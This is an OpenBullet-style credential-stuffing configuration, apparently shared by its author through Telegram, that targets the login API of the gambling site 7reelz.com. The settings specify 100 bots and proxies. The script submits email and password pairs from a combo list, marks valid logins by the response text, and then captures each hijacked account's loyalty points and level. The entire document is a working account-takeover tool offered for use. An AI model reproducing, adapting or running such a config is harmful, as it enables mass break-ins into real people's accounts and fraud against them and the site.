[SETTINGS]
{
  "Name": "7reelz",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-03-15T02:32:36.6382818+02:00",
  "AdditionalInfo": "https://t.me/Koko_Nader",
  "Author": "𝙶𝙴𝙾𝚁𝙶𝙴 𝙽𝙰𝙳𝙴𝚁 (🔥)/@Koko_Nader",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.7reelz.com/api/users/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"persists\":1}" 
  CONTENTTYPE "application/json;charset=UTF-8" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 73" 
  HEADER "content-type: application/json;charset=UTF-8" 
  HEADER "origin: https://www.7reelz.com" 
  HEADER "referer: https://www.7reelz.com/en?aid=7reelz-google-de&utm_source=sea&utm_medium=0421&utm_content=slot%20machine&utm_campaign=BestKeywords&gclid=Cj0KCQjwz7uRBhDRARIsAFqjulloZf8KROqoqHovnRbG0QdwNrbhjqfNYDjwa1XSbf-Z726CmLo_ZAQaAlN3EALw_wcB" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"errors\":[]}" 
  KEYCHAIN Failure OR 
    KEY "Email address\\/password combination not identified." 

REQUEST GET "https://www.7reelz.com/api/loyalty/getLoyaltyPoints" 
  
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "referer: https://www.7reelz.com/games/lobby" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36" 

#points PARSE "<SOURCE>" JSON "points" CreateEmpty=FALSE -> CAP "points" 

#level PARSE "<SOURCE>" JSON "level" CreateEmpty=FALSE -> CAP "level" 

FUNCTION Constant "𝙶𝙴𝙾𝚁𝙶𝙴 𝙽𝙰𝙳𝙴𝚁 (🔥)/@Koko_Nader" -> CAP "Checked By" 

